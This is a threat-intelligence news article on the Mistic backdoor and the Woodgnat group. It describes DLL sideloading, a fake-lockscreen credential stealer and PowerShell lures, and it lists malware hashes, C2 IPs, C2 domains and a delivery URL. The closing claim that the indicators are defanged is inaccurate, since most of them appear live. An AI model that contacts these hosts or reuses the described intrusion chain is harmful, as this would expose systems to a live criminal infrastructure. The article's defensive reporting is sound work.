A new and stealthy backdoor named Mistic has been quietly targeting corporate networks since April 2026, disguising itself using the names and appearance of legitimate Microsoft endpoint security components.
This clever camouflage helps it avoid detection, allowing attackers to maintain a persistent, low-profile foothold inside compromised environments. Security teams across multiple industries are now on alert as incidents continue to emerge.
Mistic has hit organizations in insurance, education, information technology, and professional services. The attacks are opportunistic in nature, meaning the group casts a wide net and evaluates which compromised networks are worth selling access to.
That access is then offered to ransomware affiliates and other criminal groups who pay for a ready-made entry point into enterprise systems.
Analysts from Symantec identified the threat and connected it to a financially motivated cybercrime group tracked as Woodgnat, also known as KongTuke.
According to Symantec report shared with Cyber Security News (CSN), the Symantec Threat Hunter Team found Mistic deployed alongside ModeloRAT, a remote access tool tied to attacks involving Qilin, Akira, Rhysida, Black Basta, Interlock, and 8Base.
Mistic was first publicly documented by Zscaler, which tracks it as MLTBackdoor. Symantec’s investigation went deeper, tying the backdoor more firmly to Woodgnat’s expanding toolkit and confirming its role in a broader criminal supply chain.
The group’s goal is not to launch the final attack itself but to sell high-value access to others who will.
What makes Mistic especially dangerous is how well it hides. It runs entirely in memory with no files written to disk, and it carries a built-in kill switch that lets it erase itself when no longer needed.
These traits make it extremely difficult to detect and allow attackers to operate quietly inside a network for extended periods.
Mistic reaches its target through a technique known as DLL sideloading, where a legitimate executable is manipulated into loading a malicious file.
In investigated attacks, a legitimate Microsoft file called MpExtMs.exe was used to sideload a malicious DLL named EndpointDlp.dll, a name directly associated with Microsoft endpoint security tooling.
This naming choice helps the backdoor appear like trusted software running in the background.
A loader called version.dll sits in the middle of this process. It hooks two Windows functions, GetModuleFileNameW and LoadLibraryW, directing execution toward the malicious DLL while keeping normal appearances intact.
A separate .NET DLL was also deployed as a credential stealer, displaying a fake login screen to harvest user passwords from unsuspecting victims.
Beyond hiding well, Mistic is highly capable. It can upload and download files, move or delete data, create folders, run remote code in memory, and adjust its check-in frequency with the attacker’s command-and-control server. This gives operators strong control over any network they manage to infiltrate.
Woodgnat’s Expanding Attack Playbook
Woodgnat has been active since at least May 2024 and has steadily refined its attack methods. The group compromises WordPress sites and injects JavaScript to profile visitors before pushing social engineering lures that trick users into running malicious commands.
These lures have evolved through ClickFix and FileFix tactics to a newer approach called CrashFix, which crashes a victim’s browser and presents a fake fix that installs malware.
Since April 2026, Woodgnat has also been using fake IT helpdesk scenarios through Microsoft Teams chats to push users into running PowerShell commands.
Once executed, a script chain downloads a portable Python environment and launches ModeloRAT, after which attackers conduct deep reconnaissance, harvest credentials, and set up multiple persistence paths.
This layered approach makes the group difficult to fully remove even after initial discovery.
Security researchers recommend monitoring for unusual DLL sideloading activity, especially when legitimate Microsoft executables load unexpected files.
Organizations should also watch for suspicious use of built-in Windows tools such as curl.exe, certutil, WMIC, and PowerShell in contexts outside normal operations.
Tuning endpoint detection toward in-memory execution and tracking abnormal network behavior remain among the most practical defenses against this threat.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| File Hash (SHA-256) | 1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984 | Backdoor.Mistic – endpointdlp.dll |
| File Hash (SHA-256) | 34d798a6c55e57ed0932b6499f4fbcb5454bdfca903307be101a0594b0ac07bc | Fake lockscreen – f.dll |
| File Hash (SHA-256) | 3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be | Backdoor.Mistic – aeff97fe.msi |
| File Hash (SHA-256) | 59e3c4cb06331b4f2d78a9a0592f3747e573bd01c5a7650c26361d1e25520712 | Loader for backdoor – version.dll |
| File Hash (SHA-256) | 8c935feec4bd05d5d918df308be417532fb42608fb989a08eab183e0ae699235 | Likely privilege escalation – n.dll |
| File Hash (SHA-256) | afd5f1ed45a9867daf3bc64152cef460a06b164c8183e490db39146d4749a82c | Backdoor.Mistic – endpointdlp.dll |
| File Hash (SHA-256) | db972979d508e75fe730d3b72c2701470fbdaeaf8ebdd674744754fa44438ca5 | Backdoor.Mistic – endpointdlp.dll |
| File Hash (SHA-256) | f591275a8f014b29e567529d67c54eb7bb4473db1c38737d6bfd5b3d52c9344e | Backdoor.Mistic – 48b47c0.msi |
| File Hash (SHA-256) | fb3630822b70bacb56aa4cec29b5a0e3e9acb3920809e70310a4003385a6d34a | Backdoor.Mistic – endpointdlp.dll |
| IP Address | 142.93.242.144 | C2 network indicator |
| IP Address | 144.31.53.78 | C2 network indicator |
| IP Address | 198.13.159.44 | C2 network indicator |
| IP Address | 199.91.221.42 | C2 network indicator |
| Domain | authorized-logins.net | Malicious C2 domain |
| Domain | b6w9m2z5x8q1v3k.top | Malicious C2 domain |
| Domain | carrolc.com | Malicious C2 domain |
| Domain | cj06y9v4xab.com | Malicious C2 domain |
| Domain | cwrtwright.com | Malicious C2 domain |
| Domain | defs.updater-worelos.com | Malicious C2 domain |
| Domain | ftps.upd-domain-goloro.com | Malicious C2 domain |
| Domain | grande-luna.top | Malicious C2 domain |
| URL | hxxp://thomphon.com/update.msi | Malware delivery URL |
| Domain | human-check.top | Malicious C2 domain |
| Domain | mail.authorized-logins.net | Malicious C2 domain |
| Domain | mailes.upd-domain-goloro.com | Malicious C2 domain |
| Domain | mails.updater-worelos.com | Malicious C2 domain |
| Domain | mueleer.com | Malicious C2 domain |
| Domain | nano.upscale-kolo.com | Malicious C2 domain |
| Domain | oeannon.com | Malicious C2 domain |
| Domain | php.authorized-logins.net | Malicious C2 domain |
| Domain | rotoa-upda-lo.com | Malicious C2 domain |
| Domain | sql-updater-service.com | Malicious C2 domain |
| Domain | sss.authorized-logins.net | Malicious C2 domain |
| Domain | thomphon.com | Malicious C2 domain |
| Domain | upd-domain-goloro.com | Malicious C2 domain |
| Domain | update.update-fall.com | Malicious C2 domain |
| Domain | updater-worelos.com | Malicious C2 domain |
| Domain | upscale-kolo.com | Malicious C2 domain |
| Domain | w3xasv14culvnqj.top | Malicious C2 domain |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
